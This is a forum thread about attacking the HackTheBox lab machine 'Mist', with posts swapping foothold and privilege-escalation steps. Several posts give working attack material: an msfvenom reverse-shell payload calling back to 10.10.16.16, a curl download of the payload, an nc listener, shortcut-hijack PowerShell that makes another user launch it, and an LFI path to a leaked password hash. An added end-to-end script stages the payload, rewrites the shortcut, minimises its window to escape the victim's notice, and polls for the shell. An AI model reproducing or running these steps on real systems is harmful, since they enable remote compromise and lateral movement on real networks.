HTB - Mist
by ghostess256 - Friday March 29, 2024 at 10:25 PM
#41
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
Reply
#42
(Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon:
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk

foreach ($file in $sourceFiles) {
    $sourceFile = $file.FullName
    $destFile = Join-Path -Path $destination -ChildPath $file.Name
    if (Test-Path -Path $destFile) {
        # compare the pristine copy in Brandon's profile with the shared copy
        $sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
        $dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
        Write-Host $sHash
        Write-Host $dHash
        # any difference means the shared .lnk was modified, so open it
        if ($sHash -ne $dHash) {
            Invoke-Item $destFile
            Start-Sleep -Seconds 5
        }
    }
}

Means you can upload a crafted .lnk file (to the directory in the code above) to trigger a shell and get a shell as brandon.

how did you do it if we don't have permissions to access the "C:\Users\Brandon.Keywarp\AppData\links"
Reply
#43
(Mar 31, 2024, 01:29 PM)FiatPandaGTRacingKit Wrote:
(Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon: [script snipped, see #42 above]
how did you do it if we don't have permissions to access the "C:\Users\Brandon.Keywarp\AppData\links"
you don't need brandon
Reply
#44
Ok time to move everyone along so we get some more eyes on this to find next steps...

Get shell as Brandon on ms01:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Save()
and wait a few min...

Brandon dirs on MS01 seem boring.
Nothing in winpeas either.
And he can only see SYSVOL on DC01 via smb.

Brandon can access certificate services (certify, certipy).
You can req a certificate for user authentication, and use it to get the ntlm pair for Brandon to PTT.
No vulnerable certs though according to the tools.

Brandon can also dump AD via ldap.

Bloodhound shows the members of Operatives group (op_ users) inherit membership to Remote Management Users, so can probably get a shell on DC01.

Sharon_Mullard has logged into MS01 in the past, her creds might be stored if we can root MS01.
The account op_Sharon_Mullard might share a password or hash with Sharon_Mullard and can probably pop a shell.
I'm thinking this is the path forward...

Anyone find anything else interesting?
I'm sure there is some clue we're all missing...
Reply
#45
(Mar 31, 2024, 04:12 PM)xxxbfacc Wrote: Ok time to move everyone along so we get some more eyes on this to find next steps... [post snipped, see #44 above]

I'm guessing that is a way forward, LSA process seems to be unprotected... 'just' get root on the MS01 box...
Reply
#46
Can someone guide me on how to get a shell as Brandon?

To escalate to the user Brandon:
First we need to create a shell.exe with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.16 LPORT=5555 -a x64 -f exe -o shell.exe
Then upload shell.exe to the path c:\xampp\htdocs; to do that, start an HTTP server and fetch it with curl:
python3 -m http.server 8000
curl -o shell.exe http://10.10.16.16:8000/shell.exe

Now run the following commands in PowerShell (if you have a cmd, switch to PowerShell):
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Save()

Wait a few minutes while we listen:
nc -lvnp 5555

Reply
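The Brandon step from #44 and #46 done end to end, as an added example that is not code from any post in this thread. It assumes the same attacker host, payload path and shortcut path the posts use (10.10.16.16:8000, c:\xampp\htdocs\shell.exe, C:\Common Applications\Calculator.lnk) and that the nc listener is already up. The write-access probe, the backup copy and the before/after hash check are additions: the scheduled script quoted in #42 only opens the shared .lnk when its SHA256 differs from Brandon's private copy, and since we cannot read that copy, the only thing we can verify locally is that the shared file really changed.

```powershell
# Added example, not from the thread. Run from the webshell user's PowerShell on MS01.
# Assumed values, taken from the posts above:
$PayloadUrl  = 'http://10.10.16.16:8000/shell.exe'      # python3 -m http.server 8000 on the attacker box
$PayloadPath = 'C:\xampp\htdocs\shell.exe'
$LinkPath    = 'C:\Common Applications\Calculator.lnk'

function Test-WriteAccess {
    # ACLs on this box are unknown, so just try to create and delete a probe file.
    param([string]$Directory)
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-Sha256Hex {
    param([string]$Path)
    return (Get-FileHash -Path $Path -Algorithm SHA256).Hash
}

function Set-ShortcutTarget {
    # Rewrite an existing .lnk (or create it) so that opening it launches $Target.
    param([string]$Path, [string]$Target)
    $shell = New-Object -ComObject WScript.Shell
    $lnk = $shell.CreateShortcut($Path)
    $lnk.TargetPath = $Target
    $lnk.WorkingDirectory = Split-Path $Target -Parent
    $lnk.WindowStyle = 7        # 7 = minimized, so the reverse shell window is not in Brandon's face
    $lnk.Save()
}

$linkDir = Split-Path $LinkPath -Parent
if (-not (Test-WriteAccess $linkDir)) {
    throw "No write access to $linkDir from this user; this path will not work here"
}

# 1. Stage the payload in the web root (same as the curl step in #46).
Invoke-WebRequest -Uri $PayloadUrl -OutFile $PayloadPath -UseBasicParsing

# 2. Record the current hash and keep a backup. The backup ends in .bak, so the
#    scheduled script's *.lnk filter ignores it, and it lets you restore the
#    original shortcut when you are done.
$before = if (Test-Path $LinkPath) { Get-Sha256Hex $LinkPath } else { '<missing>' }
if (Test-Path $LinkPath) { Copy-Item $LinkPath "$LinkPath.bak" -Force }

# 3. Repoint the shortcut and confirm the file actually changed; if the hash is
#    the same nothing will ever fire.
Set-ShortcutTarget -Path $LinkPath -Target $PayloadPath
$after = Get-Sha256Hex $LinkPath
Write-Host "before: $before"
Write-Host "after : $after"
if ($before -eq $after) { throw 'Shortcut unchanged, the hash comparison will not trigger' }

# 4. Instead of guessing "a few minutes", poll for the payload process.
$procName = [IO.Path]::GetFileNameWithoutExtension($PayloadPath)
$deadline = (Get-Date).AddMinutes(10)
while ((Get-Date) -lt $deadline) {
    $p = Get-Process -Name $procName -ErrorAction SilentlyContinue
    if ($p) { Write-Host "payload running as PID $($p.Id); check your nc listener"; break }
    Start-Sleep -Seconds 10
}
```

The poll only tells you the process started; whether it got out to your listener is visible on the nc side. If the payload never appears, the first thing to re-check is the write probe: the script in #42 runs as Brandon, but the .lnk has to be replaced by whatever user the webshell runs as.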
#47
we can mount ADMIN$, I don't know if it can help us, maybe this port forwarding is just a rabbit hole
Reply
#48
(Mar 31, 2024, 06:43 PM)3kyy Wrote:
(Mar 31, 2024, 06:24 AM)LkStr Wrote:
(Mar 30, 2024, 09:34 PM)bingle Wrote: got foothold earlier, to do so it's not that hard :
1 - go to mist.htb/data/modules/albums/albums_getimage.php?image=admin_backup.php
2 - crack the password
3 - go to http://mist.htb/admin.php?action=installmodule and upload zip with an exe and a webshell, then run the exe through the webshell
now I found out there is some sort of AV, I can't download or run winpeas.

How can I tell that `admin_backup.php` exists? Thank you for providing the solution ideas.

I have the same question, I get the:

<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146

But for this hint, I really don't know how I can know this file exists, and I downloaded the source of pluck 4.7.18 and this file doesn't exist. Help! And thanks

There is an LFI for version 4.7 that lists this endpoint. Checking its source code on GitHub you can see where it looks for files (images) to be included (../../settings/modules/albums/) and directory listing is enabled there -> http://mist.htb/data/settings/modules/albums/

Reply
#49
(Mar 31, 2024, 04:25 PM)defxsec Wrote: Can someone guide me on how to get a shell as Brandon? [post snipped, see #46 above]

I'm confused, you upload the shell.exe with curl to the pluck machine?

Reply
#50
Got a Brandon shell but idk what to do next
Reply